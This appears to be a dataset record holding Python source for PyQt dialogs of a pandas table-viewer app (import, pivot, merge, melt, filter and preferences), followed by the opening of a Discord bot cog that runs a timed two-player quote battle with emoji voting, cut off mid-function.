buttonbox.button(QDialogButtonBox.Ok).clicked.connect(self.accept)\n buttonbox.button(QDialogButtonBox.Cancel).clicked.connect(self.close)\n vbox.addWidget(buttonbox)\n self.show()\n return self.values\n\n def accept(self):\n self.values = getWidgetValues(self.widgets)\n self.accepted = True\n self.close()\n return\n\n\nclass ImportDialog(QDialog):\n \"\"\"Provides a dialog for import settings\"\"\"\n\n def __init__(self, parent=None, filename=None):\n\n super(ImportDialog, self).__init__(parent)\n self.parent = parent\n self.filename = filename\n self.df = None\n self.setGeometry(QtCore.QRect(250, 250, 900, 600))\n self.setGeometry(\n QStyle.alignedRect(\n QtCore.Qt.LeftToRight,\n QtCore.Qt.AlignCenter,\n self.size(),\n QGuiApplication.primaryScreen().availableGeometry(),\n ))\n self.setWindowTitle('Import File')\n self.createWidgets()\n self.update()\n self.show()\n return\n\n def createWidgets(self):\n \"\"\"Create widgets\"\"\"\n\n delimiters = [',', r'\\t', ' ', '\\s+', ';', '/', '&', '|', '^', '+', '-']\n encodings = ['utf-8', 'ascii', 'latin-1', 'iso8859_15', 'cp037', 'cp1252', 'big5', 'euc_jp']\n timeformats = ['infer', '%d/%m/%Y', '%Y/%m/%d', '%Y/%d/%m',\n '%Y-%m-%d %H:%M:%S', '%Y-%m-%d %H:%M',\n '%d-%m-%Y %H:%M:%S', '%d-%m-%Y %H:%M']\n grps = {'formats': ['sep', 'decimal', 'comment'],\n 'data': ['skiprows', 'skipinitialspace',\n 'skip_blank_lines', 'parse_dates', 'encoding', 'time format'],\n 'other': ['rowsperfile']}\n grps = OrderedDict(sorted(grps.items()))\n opts = self.opts = {'sep': {'type': 'combobox', 'default': ',', 'editable': True,\n 'items': delimiters, 'tooltip': 'seperator'},\n # 'header':{'type':'entry','default':0,'label':'header',\n # 'tooltip':'position of column header'},\n # 'index_col':{'type':'spinbox','default':-1,'range':(-1,1000),'label':'index column',\n # 'tooltip':''},\n 'decimal': {'type': 'combobox', 'default': '.', 'items': ['.', ','],\n 'tooltip': 'decimal point symbol'},\n 'comment': {'type': 'entry', 'default': '#', 'label': 'comment',\n 'tooltip': 'comment symbol'},\n 'skipinitialspace': {'type': 'checkbox', 'default': 0, 'label': 'skip initial space',\n 'tooltip': 'skip initial space'},\n 'skiprows': {'type': 'spinbox', 'default': 0, 'label': 'skiprows',\n 'tooltip': 'rows to skip'},\n 'skip_blank_lines': {'type': 'checkbox', 'default': 0, 'label': 'skip blank lines',\n 'tooltip': 'do not use blank lines'},\n 'parse_dates': {'type': 'checkbox', 'default': 1, 'label': 'parse dates',\n 'tooltip': 'try to parse date/time columns'},\n 'time format': {'type': 'combobox', 'default': '', 'items': timeformats,\n 'tooltip': 'date/time format'},\n 'encoding': {'type': 'combobox', 'default': 'utf-8', 'items': encodings,\n 'tooltip': 'file encoding'},\n # 'prefix':{'type':'entry','default':None,'label':'prefix',\n # 'tooltip':''}\n 'rowsperfile': {'type': 'spinbox', 'default': 0, 'label': 'rows per file',\n 'tooltip': 'rows to read'},\n # 'names':{'type':'entry','default':'','label':'column names',\n # 'tooltip':'col labels'},\n }\n\n optsframe, self.widgets = dialogFromOptions(self, opts, grps, wrap=1, section_wrap=1)\n layout = QGridLayout()\n layout.setColumnStretch(1, 2)\n layout.addWidget(optsframe, 1, 1)\n optsframe.setMaximumWidth(300)\n bf = self.createButtons(optsframe)\n layout.addWidget(bf, 2, 1)\n\n main = QSplitter(self)\n main.setOrientation(QtCore.Qt.Vertical)\n layout.addWidget(main, 1, 2, 2, 1)\n\n self.textarea = PlainTextEditor(main)\n main.addWidget(self.textarea)\n self.textarea.resize(200, 200)\n\n t = self.previewtable = 
core.DataFrameTable(main, font=core.FONT)\n main.addWidget(t)\n self.setLayout(layout)\n return\n\n def createButtons(self, parent):\n\n bw = self.button_widget = QWidget(parent)\n vbox = QVBoxLayout(bw)\n button = QPushButton(\"Update\")\n button.clicked.connect(self.update)\n vbox.addWidget(button)\n button = QPushButton(\"Import\")\n button.clicked.connect(self.doImport)\n vbox.addWidget(button)\n button = QPushButton(\"Cancel\")\n button.clicked.connect(self.quit)\n vbox.addWidget(button)\n return bw\n\n def showText(self):\n \"\"\"Show text contents\"\"\"\n\n with open(self.filename, 'r') as stream:\n try:\n text = stream.read()\n except:\n text = 'failed to preview, check encoding and then update preview\\n'\n self.textarea.clear()\n self.textarea.insertPlainText(text)\n self.textarea.verticalScrollBar().setValue(1)\n return\n\n def update(self):\n \"\"\"Reload previews\"\"\"\n\n self.showText()\n self.values = getWidgetValues(self.widgets)\n timeformat = self.values['time format']\n if timeformat == 'infer':\n dateparse = None\n else:\n dateparse = lambda x: pd.datetime.strptime(x, timeformat)\n del self.values['time format']\n del self.values['rowsperfile']\n for k in self.values:\n if self.values[k] == '':\n self.values[k] = None\n # if self.values['index_col'] == -1:\n # self.values['index_col'] = None\n\n try:\n f = pd.read_csv(self.filename, chunksize=400, error_bad_lines=False,\n warn_bad_lines=False, date_parser=dateparse, **self.values)\n except Exception as e:\n print('read csv error')\n print(e)\n return\n try:\n df = f.get_chunk()\n except UnicodeDecodeError:\n print('unicode error')\n df = pd.DataFrame()\n except pd.errors.ParserError:\n print('parser error')\n df = pd.DataFrame()\n\n self.previewtable.model.df = df\n self.previewtable.refresh()\n return\n\n def doImport(self):\n \"\"\"Do the import\"\"\"\n\n self.update()\n self.df = pd.read_csv(self.filename, **self.values)\n self.close()\n return\n\n def quit(self):\n self.close()\n return\n\n\nclass BasicDialog(QDialog):\n \"\"\"Qdialog for table operations interfaces\"\"\"\n\n def __init__(self, parent, df, title=None):\n\n super(BasicDialog, self).__init__(parent)\n self.parent = parent\n self.df = df\n self.app = self.parent.app\n self.setWindowTitle(title)\n self.createWidgets()\n self.setGeometry(QtCore.QRect(400, 300, 1000, 600))\n self.show()\n return\n\n def createWidgets(self):\n \"\"\"Create widgets - override this\"\"\"\n\n cols = list(self.df.columns)\n\n def createButtons(self, parent):\n\n bw = self.button_widget = QWidget(parent)\n vbox = QVBoxLayout(bw)\n vbox.setAlignment(QtCore.Qt.AlignTop)\n button = QPushButton(\"Apply\")\n button.clicked.connect(self.apply)\n vbox.addWidget(button)\n button = QPushButton(\"Copy to sub-table\")\n button.clicked.connect(self.copy_to_subtable)\n vbox.addWidget(button)\n button = QPushButton(\"Copy to clipboard\")\n button.clicked.connect(self.copy_to_clipboard)\n vbox.addWidget(button)\n button = QPushButton(\"Copy to new sheet\")\n button.clicked.connect(self.copy_to_sheet)\n vbox.addWidget(button)\n button = QPushButton(\"Export result\")\n button.clicked.connect(self.export)\n vbox.addWidget(button)\n button = QPushButton(\"Close\")\n button.clicked.connect(self.close)\n vbox.addWidget(button)\n return bw\n\n def apply(self):\n \"\"\"Override this\"\"\"\n return\n\n def copy_to_subtable(self):\n \"\"\"Do the operation\"\"\"\n\n df = self.table.model.df\n self.parent.showSubTable(df)\n return\n\n def copy_to_sheet(self):\n \"\"\"Copy result to new sheet in app, if 
available\"\"\"\n\n if self.app == None:\n return\n name, ok = QInputDialog().getText(self, \"Enter Sheet Name\",\n \"Name:\", QLineEdit.Normal)\n if ok and name:\n self.app.addSheet(name=name, df=self.table.model.df)\n return\n\n def copy_to_clipboard(self):\n \"\"\"Copy result to clipboard\"\"\"\n\n df = self.table.model.df\n df.to_clipboard()\n return\n\n def export(self):\n \"\"\"export result to file\"\"\"\n\n df = self.table.model.df\n options = QFileDialog.Options()\n filename, _ = QFileDialog.getSaveFileName(self, \"Export File\",\n \"\", \"CSV files (*.csv);;\",\n options=options)\n if not filename:\n return\n if not os.path.splitext(filename)[1] == '.csv':\n filename += '.csv'\n df.to_csv(filename)\n return\n\n def close(self):\n self.destroy()\n return\n\n\nclass AggregateDialog(BasicDialog):\n \"\"\"Qdialog with multiple inputs\"\"\"\n\n def __init__(self, parent, df, title='Groupby-Aggregate'):\n\n BasicDialog.__init__(self, parent, df, title)\n return\n\n def createWidgets(self):\n \"\"\"Create widgets\"\"\"\n\n cols = list(self.df.columns)\n funcs = ['sum', 'mean', 'size', 'std', 'min', 'max', 'var']\n vbox = QHBoxLayout(self)\n main = QWidget(self)\n main.setMaximumWidth(300)\n vbox.addWidget(main)\n\n l = QVBoxLayout(main)\n w = self.groupbyw = QListWidget(main)\n w.setSelectionMode(QAbstractItemView.MultiSelection)\n w.addItems(cols)\n l.addWidget(QLabel('Group by'))\n l.addWidget(w)\n w = self.aggw = QListWidget(main)\n w.setSelectionMode(QAbstractItemView.MultiSelection)\n w.addItems(cols)\n l.addWidget(QLabel('Aggregate on'))\n l.addWidget(w)\n w = self.funcw = QListWidget(main)\n w.setSelectionMode(QAbstractItemView.MultiSelection)\n w.addItems(funcs)\n l.addWidget(QLabel('Functions'))\n l.addWidget(w)\n\n self.table = core.DataFrameTable(self, font=core.FONT)\n vbox.addWidget(self.table)\n bf = self.createButtons(self)\n vbox.addWidget(bf)\n return\n\n def customButtons():\n vbox.addWidget(QLabel('map cols to functions'))\n mapcolsbtn = QCheckBox()\n vbox.addWidget(mapcolsbtn)\n\n def apply(self):\n \"\"\"Do the operation\"\"\"\n\n grpcols = [i.text() for i in self.groupbyw.selectedItems()]\n aggcols = [i.text() for i in self.aggw.selectedItems()]\n funcs = [i.text() for i in self.funcw.selectedItems()]\n aggdict = {}\n\n if len(funcs) == 1: funcs = funcs[0]\n for a in aggcols:\n aggdict[a] = funcs\n\n res = self.df.groupby(grpcols).agg(aggdict).reset_index()\n self.table.model.df = res\n self.table.refresh()\n return\n\n\nclass PivotDialog(BasicDialog):\n \"\"\"Dialog to pivot table\"\"\"\n\n def __init__(self, parent, df, title='Pivot'):\n BasicDialog.__init__(self, parent, df, title)\n return\n\n def createWidgets(self):\n \"\"\"Create widgets\"\"\"\n\n cols = list(self.df.columns)\n funcs = ['sum', 'mean', 'size', 'std', 'min', 'max', 'var']\n vbox = QHBoxLayout(self)\n main = QWidget(self)\n main.setMaximumWidth(300)\n vbox.addWidget(main)\n\n l = QVBoxLayout(main)\n w = self.columnsw = QListWidget(main)\n w.setSelectionMode(QAbstractItemView.MultiSelection)\n w.addItems(cols)\n l.addWidget(QLabel('Columns'))\n l.addWidget(w)\n w = self.idxw = QListWidget(main)\n w.setSelectionMode(QAbstractItemView.MultiSelection)\n w.addItems(cols)\n l.addWidget(QLabel('Index'))\n l.addWidget(w)\n w = self.valuesw = QListWidget(main)\n w.setSelectionMode(QAbstractItemView.MultiSelection)\n w.addItems(cols)\n l.addWidget(QLabel('Values'))\n l.addWidget(w)\n w = self.aggw = QListWidget(main)\n w.addItems(funcs)\n l.addWidget(QLabel('Aggregate function'))\n l.addWidget(w)\n\n 
self.table = core.DataFrameTable(self, font=core.FONT)\n vbox.addWidget(self.table)\n bf = self.createButtons(self)\n vbox.addWidget(bf)\n return\n\n def apply(self):\n \"\"\"Do the operation\"\"\"\n\n cols = [i.text() for i in self.columnsw.selectedItems()]\n vals = [i.text() for i in self.valuesw.selectedItems()]\n idx = [i.text() for i in self.idxw.selectedItems()]\n aggfuncs = [i.text() for i in self.aggw.selectedItems()]\n res = pd.pivot_table(self.df, index=idx, columns=cols, values=vals, aggfunc=aggfuncs)\n names = res.index.names\n res = res.reset_index(col_level=2)\n # print (res)\n if util.check_multiindex(res.columns) == 1:\n res.columns = res.columns.get_level_values(2)\n\n self.table.model.df = res\n self.table.refresh()\n return\n\n\nclass MeltDialog(BasicDialog):\n \"\"\"Dialog to melt table\"\"\"\n\n def __init__(self, parent, df, title='Melt'):\n BasicDialog.__init__(self, parent, df, title)\n return\n\n def createWidgets(self):\n \"\"\"Create widgets\"\"\"\n\n cols = list(self.df.columns)\n funcs = ['sum', 'mean', 'size', 'std', 'min', 'max', 'var']\n vbox = QHBoxLayout(self)\n main = QWidget(self)\n main.setMaximumWidth(300)\n vbox.addWidget(main)\n\n l = QVBoxLayout(main)\n w = self.idvarsw = QListWidget(main)\n w.setSelectionMode(QAbstractItemView.MultiSelection)\n w.addItems(cols)\n l.addWidget(QLabel('ID vars'))\n l.addWidget(w)\n w = self.valuevarsw = QListWidget(main)\n w.setSelectionMode(QAbstractItemView.MultiSelection)\n w.addItems(cols)\n l.addWidget(QLabel('Value vars'))\n l.addWidget(w)\n w = self.varnamew = QLineEdit('var')\n l.addWidget(QLabel('Var name'))\n l.addWidget(w)\n\n self.table = core.DataFrameTable(self, font=core.FONT)\n vbox.addWidget(self.table)\n bf = self.createButtons(self)\n vbox.addWidget(bf)\n return\n\n def apply(self):\n \"\"\"Do the operation\"\"\"\n\n idvars = [i.text() for i in self.idvarsw.selectedItems()]\n value_vars = [i.text() for i in self.valuevarsw.selectedItems()]\n varname = self.varnamew.text()\n res = pd.melt(self.df, idvars, value_vars, varname)\n\n self.table.model.df = res\n self.table.refresh()\n return\n\n\nclass MergeDialog(BasicDialog):\n \"\"\"Dialog to merge two tables\"\"\"\n\n def __init__(self, parent, df, title='Merge Tables'):\n\n BasicDialog.__init__(self, parent, df, title)\n return\n\n def createWidgets(self):\n \"\"\"Create widgets\"\"\"\n\n if hasattr(self.parent, 'subtable') and self.parent.subtable is not None:\n self.df2 = self.parent.subtable.table.model.df\n cols2 = self.df2.columns\n else:\n self.df2 = None\n cols2 = []\n cols = list(self.df.columns)\n ops = ['merge', 'concat']\n how = ['inner', 'outer', 'left', 'right']\n hbox = QHBoxLayout(self)\n main = QWidget(self)\n main.setMaximumWidth(300)\n hbox.addWidget(main)\n\n l = QVBoxLayout(main)\n w = self.ops_w = QComboBox(main)\n w.addItems(ops)\n l.addWidget(QLabel('Operation'))\n l.addWidget(w)\n w = self.lefton_w = QListWidget(main)\n w.setSelectionMode(QAbstractItemView.MultiSelection)\n w.addItems(cols)\n l.addWidget(QLabel('Left on'))\n l.addWidget(w)\n w = self.righton_w = QListWidget(main)\n w.setSelectionMode(QAbstractItemView.MultiSelection)\n w.addItems(cols2)\n l.addWidget(QLabel('Right on'))\n l.addWidget(w)\n\n w = self.leftindex_w = QCheckBox(main)\n w.setChecked(False)\n l.addWidget(QLabel('Use left index'))\n l.addWidget(w)\n w = self.rightindex_w = QCheckBox(main)\n w.setChecked(False)\n l.addWidget(QLabel('Use right index'))\n l.addWidget(w)\n\n w = self.how_w = QComboBox(main)\n w.addItems(how)\n l.addWidget(QLabel('How'))\n l.addWidget(w)\n\n 
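# pd.merge does not accept both on= columns and index flags at once,\n # which is why apply() below nulls lefton/righton whenever the\n # corresponding index checkbox is ticked\n 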
w = self.left_suffw = QLineEdit('_1')\n l.addWidget(QLabel('Left suffix'))\n l.addWidget(w)\n w = self.right_suffw = QLineEdit('_2')\n l.addWidget(QLabel('Right suffix'))\n l.addWidget(w)\n\n self.table = core.DataFrameTable(self, font=core.FONT)\n hbox.addWidget(self.table)\n bf = self.createButtons(self)\n hbox.addWidget(bf)\n return\n\n def updateColumns(self):\n \"\"\"Refresh the 'right on' columns from the current sub-table\"\"\"\n\n cols2 = self.df2.columns\n w = self.righton_w\n w.clear()\n w.addItems(cols2)\n return\n\n def apply(self):\n \"\"\"Do the operation\"\"\"\n\n left_index = self.leftindex_w.isChecked()\n right_index = self.rightindex_w.isChecked()\n if left_index:\n lefton = None\n else:\n lefton = [i.text() for i in self.lefton_w.selectedItems()]\n if right_index:\n righton = None\n else:\n righton = [i.text() for i in self.righton_w.selectedItems()]\n how = self.how_w.currentText()\n op = self.ops_w.currentText()\n if op == 'merge':\n res = pd.merge(self.df, self.df2,\n left_on=lefton,\n right_on=righton,\n left_index=left_index,\n right_index=right_index,\n how=how,\n suffixes=(self.left_suffw.text(), self.right_suffw.text())\n )\n else:\n res = pd.concat([self.df, self.df2])\n self.table.model.df = res\n self.table.refresh()\n return\n\n\nclass ConvertTypesDialog(BasicDialog):\n \"\"\"Dialog to convert column types\"\"\"\n\n def __init__(self, parent, df, title='Convert types'):\n BasicDialog.__init__(self, parent, df, title)\n return\n\n def createButtons(self, parent):\n bw = self.button_widget = QWidget(parent)\n vbox = QVBoxLayout(bw)\n vbox.setAlignment(QtCore.Qt.AlignTop)\n button = QPushButton(\"Apply\")\n button.clicked.connect(self.apply)\n vbox.addWidget(button)\n button = QPushButton(\"Copy to new sheet\")\n button.clicked.connect(self.copy_to_sheet)\n vbox.addWidget(button)\n button = QPushButton(\"Close\")\n button.clicked.connect(self.close)\n vbox.addWidget(button)\n return bw\n\n def createWidgets(self):\n \"\"\"Create widgets\"\"\"\n\n cols = list(self.df.columns)\n\n vbox = QHBoxLayout(self)\n main = QWidget(self)\n main.setMaximumWidth(300)\n vbox.addWidget(main)\n\n res = []\n for col in self.df.columns:\n res.append([col, str(self.df[col].dtype), ''])\n cols = ['name', 'type', 'convert']\n info = pd.DataFrame(res, columns=cols)\n\n self.table = core.DataFrameTable(self, info, font=core.FONT)\n types = ['int', 'float', 'category']\n\n vbox.addWidget(self.table)\n bf = self.createButtons(self)\n vbox.addWidget(bf)\n return\n\n def apply(self):\n \"\"\"Do the operation\"\"\"\n\n # convert each column to the dtype entered in its 'convert' cell\n info = self.table.model.df\n res = self.df.copy()\n for _, row in info.iterrows():\n newtype = row['convert']\n if not newtype:\n continue\n try:\n res[row['name']] = res[row['name']].astype(newtype)\n except (TypeError, ValueError):\n print('could not convert %s to %s' % (row['name'], newtype))\n self.df = res\n return\n\n\nclass PreferencesDialog(QDialog):\n \"\"\"Preferences dialog from config parser options\"\"\"\n\n def __init__(self, parent, options={}):\n super(PreferencesDialog, self).__init__(parent)\n self.parent = parent\n self.setWindowTitle('Preferences')\n self.resize(700, 200)\n self.setGeometry(QtCore.QRect(300, 300, 600, 200))\n self.setMaximumWidth(600)\n self.setMaximumHeight(300)\n self.createWidgets(options)\n self.show()\n return\n\n def createWidgets(self, options):\n \"\"\"create widgets\"\"\"\n\n import pylab as plt\n colormaps = sorted(m for m in plt.cm.datad if not m.endswith(\"_r\"))\n timeformats = ['%m/%d/%Y', '%d/%m/%Y', '%d/%m/%y',\n '%Y/%m/%d', '%y/%m/%d', '%Y/%d/%m',\n '%d-%b-%Y', '%b-%d-%Y',\n '%Y-%m-%d %H:%M:%S', '%Y-%m-%d 
%H:%M',\n '%d-%m-%Y %H:%M:%S', '%d-%m-%Y %H:%M']\n self.opts = {'rowheight': {'type': 'spinbox', 'default': 18, 'range': (5, 50), 'label': 'row height'},\n 'columnwidth': {'type': 'spinbox', 'range': (10, 300),\n 'default': options['columnwidth'], 'label': 'column width'},\n 'alignment': {'type': 'combobox', 'default': 'w', 'items': ['left', 'right', 'center'],\n 'label': 'text align'},\n 'font': {'type': 'font', 'default': options['font']},\n 'fontsize': {'type': 'slider', 'default': options['fontsize'], 'range': (5, 40),\n 'interval': 1, 'label': 'font size'},\n 'timeformat': {'type': 'combobox', 'default': options['timeformat'],\n 'items': timeformats, 'label': 'Date/Time format'}\n # 'floatprecision':{'type':'spinbox','default':2, 'label':'precision'},\n }\n sections = {'table': ['alignment', 'rowheight', 'columnwidth'],\n 'formats': ['font', 'fontsize', 'timeformat']}\n\n dialog, self.widgets = dialogFromOptions(self, self.opts, sections)\n\n self.layout = QVBoxLayout(self)\n self.layout.addWidget(dialog)\n dialog.setFocus()\n bw = self.createButtons(self)\n self.layout.addWidget(bw)\n return\n\n def createButtons(self, parent):\n bw = self.button_widget = QWidget(parent)\n vbox = QHBoxLayout(bw)\n button = QPushButton(\"Apply\")\n button.clicked.connect(self.apply)\n vbox.addWidget(button)\n button = QPushButton(\"Close\")\n button.clicked.connect(self.close)\n vbox.addWidget(button)\n return bw\n\n def apply(self):\n \"\"\"Apply options to current table\"\"\"\n\n kwds = getWidgetValues(self.widgets)\n from . import core\n core.FONT = kwds['font']\n core.FONTSIZE = kwds['fontsize']\n core.COLUMNWIDTH = kwds['columnwidth']\n core.TIMEFORMAT = kwds['timeformat']\n self.parent.refresh()\n return\n\n\nclass FilterDialog(QWidget):\n \"\"\"Qdialog for table query/filtering\"\"\"\n\n def __init__(self, parent, table, title=None):\n\n super(FilterDialog, self).__init__(parent)\n self.parent = parent\n # self.app = self.parent.app\n self.table = table\n self.setWindowTitle(title)\n self.resize(400, 200)\n self.createWidgets()\n self.filters = []\n # self.setMinimumHeight(200)\n # self.show()\n return\n\n def createToolBar(self, parent):\n\n items = {'Apply': {'action': self.apply, 'file': 'filter'},\n 'Add': {'action': self.addFilter, 'file': 'add'},\n 'Refresh': {'action': self.refresh, 'file': 'table-refresh'},\n 'Subtract': {'action': self.removeFiltered, 'file': 'table-remove'}\n }\n toolbar = QToolBar(\"Toolbar\")\n toolbar.setOrientation(QtCore.Qt.Horizontal)\n addToolBarItems(toolbar, self, items)\n # vbox.addWidget(toolbar)\n return toolbar\n\n def createWidgets(self):\n \"\"\"Create widgets\"\"\"\n\n df = self.table.model.df\n cols = list(df.columns)\n self.layout = QVBoxLayout(self)\n self.setLayout(self.layout)\n self.query_w = QLineEdit()\n self.layout.addWidget(QLabel('String filter'))\n self.layout.addWidget(self.query_w)\n self.query_w.returnPressed.connect(self.apply)\n w = self.column_w = QListWidget()\n w.setSelectionMode(QAbstractItemView.MultiSelection)\n # w.setFixedHeight(60)\n w.addItems(cols)\n self.layout.addWidget(QLabel('Filter Columns'))\n self.layout.addWidget(self.column_w)\n tb = self.createToolBar(self)\n self.layout.addWidget(tb)\n self.adjustSize()\n return\n\n def refresh(self):\n \"\"\"Reset the table\"\"\"\n\n table = self.table\n if table.filtered and hasattr(table, 'dataframe'):\n table.model.df = table.dataframe\n table.filtered = False\n table.refresh()\n return\n\n def update(self):\n \"\"\"Update the column widgets if 
table has changed\"\"\"\n\n df = self.table.model.df\n cols = list(df.columns)\n self.column_w.clear()\n self.column_w.addItems(cols)\n return\n\n def addFilter(self):\n \"\"\"Add a filter using widgets\"\"\"\n\n df = self.table.model.df\n fb = FilterBar(self, self.table)\n self.layout.insertWidget(4, fb)\n self.filters.append(fb)\n return\n\n def apply(self):\n \"\"\"Apply filters\"\"\"\n\n table = self.table\n if table.filtered == True and hasattr(table, 'dataframe'):\n table.model.df = table.dataframe\n df = table.model.df\n mask = None\n\n s = self.query_w.text()\n cols = [i.text() for i in self.column_w.selectedItems()]\n if len(cols) > 0:\n df = df[cols]\n if s != '':\n try:\n mask = df.eval(s)\n except:\n mask = df.eval(s, engine='python')\n\n # add widget based filters\n if len(self.filters) > 0:\n mask = self.applyWidgetFilters(df, mask)\n # apply mask\n if mask is not None:\n df = df[mask]\n self.filtdf = df\n table.dataframe = table.model.df.copy()\n table.filtered = True\n table.model.df = df\n table.model.layoutChanged.emit()\n table.refresh()\n\n return\n\n def applyWidgetFilters(self, df, mask=None):\n \"\"\"Apply the widget based filters, returns a boolean mask\"\"\"\n\n if mask is None:\n mask = df.index == df.index\n\n for f in self.filters:\n col, val, op, b = f.getFilter()\n try:\n val = float(val)\n except:\n pass\n print(col, val, op, b)\n if op == 'contains':\n m = df[col].str.contains(str(val))\n elif op == 'equals':\n m = df[col] == val\n elif op == 'not equals':\n m = df[col] != val\n elif op == '>':\n m = df[col] > val\n elif op == '<':\n m = df[col] < val\n elif op == 'is empty':\n m = df[col].isnull()\n elif op == 'not empty':\n m = ~df[col].isnull()\n elif op == 'excludes':\n m = -df[col].str.contains(val)\n elif op == 'starts with':\n m = df[col].str.startswith(val)\n elif op == 'has length':\n m = df[col].str.len() > val\n elif op == 'is number':\n m = df[col].astype('object').str.isnumeric()\n elif op == 'is lowercase':\n m = df[col].astype('object').str.islower()\n elif op == 'is uppercase':\n m = df[col].astype('object').str.isupper()\n else:\n continue\n if b == 'AND':\n mask = mask & m\n elif b == 'OR':\n mask = mask | m\n elif b == 'NOT':\n mask = mask ^ m\n return mask\n\n def removeFiltered(self):\n \"\"\"Subtract current filtered result from original table\"\"\"\n\n reply = QMessageBox.question(self, 'Perform Action?',\n 'This will overwrite the current table. 
Are you sure?',\n QMessageBox.Yes, QMessageBox.No)\n if reply == QMessageBox.No:\n return\n table = self.table\n if table.filtered == False:\n return\n idx = list(self.filtdf.index)\n df = table.dataframe\n table.dataframe = None\n table.filtered = False\n table.model.df = df.loc[~df.index.isin(idx)]\n table.model.layoutChanged.emit()\n table.refresh()\n return\n\n def onClose(self):\n\n self.table.showAll()\n self.close()\n\n\nclass FilterBar(QWidget):\n \"\"\"Single Widget based filter\"\"\"\n\n def __init__(self, parent, table):\n super(FilterBar, self).__init__(parent)\n self.parent = parent\n # self.app = self.parent.app\n self.table = table\n self.createWidgets()\n\n def createWidgets(self):\n \"\"\"Create widgets\"\"\"\n\n operators = ['contains', 'excludes', 'equals', 'not equals', '>', '<', 'is empty', 'not empty',\n 'starts with', 'ends with', 'has length', 'is number', 'is lowercase', 'is uppercase']\n booleanops = ['AND', 'OR', 'NOT']\n df = self.table.model.df\n cols = list(df.columns)\n l = self.layout = QHBoxLayout(self)\n self.setLayout(self.layout)\n w = self.boolean_w = QComboBox()\n w.addItems(booleanops)\n l.addWidget(self.boolean_w)\n w = self.column_w = QComboBox()\n w.addItems(cols)\n # l.addWidget(QLabel('Column:'))\n l.addWidget(self.column_w)\n w = self.operator_w = QComboBox()\n w.addItems(operators)\n l.addWidget(self.operator_w)\n\n self.term_w = QLineEdit()\n l.addWidget(self.term_w)\n icon = QIcon(os.path.join(iconpath, 'remove.png'))\n btn = QPushButton()\n btn.setIcon(icon)\n btn.setMaximumWidth(30)\n btn.clicked.connect(self.onClose)\n l.addWidget(btn)\n return\n\n def getFilter(self):\n \"\"\"Get filter values for this instance\"\"\"\n\n col = self.column_w.currentText()\n val = self.term_w.text()\n op = self.operator_w.currentText()\n booleanop = self.boolean_w.currentText()\n return col, val, op, booleanop\n\n def onClose(self, ce):\n self.parent.filters.remove(self)\n self.close()\n","repo_name":"frynet/AnalyticApp","sub_path":"tablexplore/dialogs.py","file_name":"dialogs.py","file_ext":"py","file_size_in_byte":41059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33520599330","text":"import asyncio\nimport random\n\nimport discord\nfrom discord.ext import commands\n\nimport discord_utils as du\nfrom template_cog import LotrCog\n\n\nclass QuoteBattle(LotrCog):\n \"\"\"\n manages a quote-battle between two users\n \"\"\"\n\n def __init__(self, bot):\n super().__init__(bot)\n\n @du.category_check('battles')\n @du.channel_busy_check()\n @commands.guild_only()\n @commands.command(name='quotebattle', aliases=['qbattle', 'qb', 'quote-battle', 'quotefight', 'qfight', 'qf'])\n async def quote_battle_handler(self, ctx):\n \"\"\"\n starts a quote battle with subsequent voting\n \"\"\"\n server = ctx.guild\n # perms_changed = []\n\n result, players = await du.handle_ready_check(self.bot, ctx, player_count=2)\n\n if not result:\n return\n\n # for player in players:\n # self.bot.blocked.append(player.id)\n # if not ctx.channel.permissions_for(player).send_messages:\n # perms_changed.append(player)\n # await ctx.channel.set_permissions(player, send_messages=True, reason='Quote battle')\n\n def quote_check(chk_msg):\n return chk_msg.channel == ctx.channel and chk_msg.author in players\n\n self.bot.busy_channels.append(ctx.channel.id)\n orig_rounds = self.bot.config['discord']['quote_battle']['rounds'] * 2\n rounds_left = orig_rounds - 1\n random.shuffle(players)\n act_player = players[0]\n first_round = 
True\n await ctx.send(\n f'Welcome to the epic quote battle between {players[0].mention} and {players[1].mention}!\\n{act_player.display_name} starts! Prepare for battle!')\n\n while rounds_left > 0:\n try:\n msg = await self.bot.wait_for('message', check=quote_check,\n timeout=self.bot.config['discord']['quote_battle']['timeout'] // 2)\n except asyncio.TimeoutError:\n await ctx.send('Careful both of you, half of your time to respond has passed!', delete_after=30)\n try:\n # assign the reply here, otherwise the warning message above\n # would be treated as the player's answer below\n msg = await self.bot.wait_for('message', check=quote_check,\n timeout=self.bot.config['discord']['quote_battle']['timeout'] // 2)\n except asyncio.TimeoutError:\n await ctx.send('You did not answer in time. The battle ended.')\n break\n\n if first_round:\n if msg.author.id == act_player.id:\n first_round = False\n else:\n await ctx.send(f'Hey, wait for {act_player.display_name} to start the battle!', delete_after=10)\n await msg.delete()\n continue\n\n if msg.author.id != act_player.id:\n rounds_left -= 1\n act_player = msg.author\n if rounds_left == orig_rounds // 2:\n await ctx.send(f'Half-time! {rounds_left} rounds to go!')\n\n # for player in players:\n # self.bot.blocked.remove(player.id)\n # if player in perms_changed:\n # await ctx.set_permissions(player, send_messages=False, reason='Quote battle')\n if ctx.channel.id in self.bot.busy_channels:\n self.bot.busy_channels.remove(ctx.channel.id)\n\n msg_text = 'The quote battle between {} and {} ended.\\n{} :one: for {} and :two: for {}'\n if server.id in self.bot.config['discord']['quote_battle']['voting_roles']:\n score_msg = await ctx.send(msg_text.format(players[0].display_name, players[1].display_name,\n f\"Hey <@&{self.bot.config['discord']['quote_battle']['voting_roles'][server.id]}>, vote\",\n players[0].mention, players[1].mention))\n else:\n score_msg = await ctx.send(\n msg_text.format(players[0].display_name, players[1].display_name, 'Vote', players[0].mention,\n players[1].mention))\n\n await score_msg.add_reaction('1️⃣') # number 1\n await score_msg.add_reaction('2️⃣') # number 2\n await asyncio.sleep(self.bot.config['discord']['quote_battle']['voting_time'])\n\n try:\n # re-fetch message\n score_msg = await ctx.fetch_message(score_msg.id)\n await score_msg.add_reaction('🛑') # stop-sign\n\n # remove bot reactions, and remove self-votes\n await score_msg.remove_reaction('1️⃣', server.me)\n try:\n await score_msg.remove_reaction('1️⃣', players[0])\n except discord.errors.NotFound:\n pass\n\n await score_msg.remove_reaction('2️⃣', server.me)\n try:\n await score_msg.remove_reaction('2️⃣', players[1])\n except discord.errors.NotFound:\n pass\n\n # re-fetch message again\n score_msg = await ctx.fetch_message(score_msg.id)\n\n voting = [0, 0]\n for item in score_msg.reactions:\n if item.emoji == '1️⃣':\n voting[0] = item.count\n elif item.emoji == '2️⃣':\n voting[1] = item.count\n\n ret_str = f'The vote for the battle between {players[0].mention} and {players[1].mention} concluded.\\n'\n 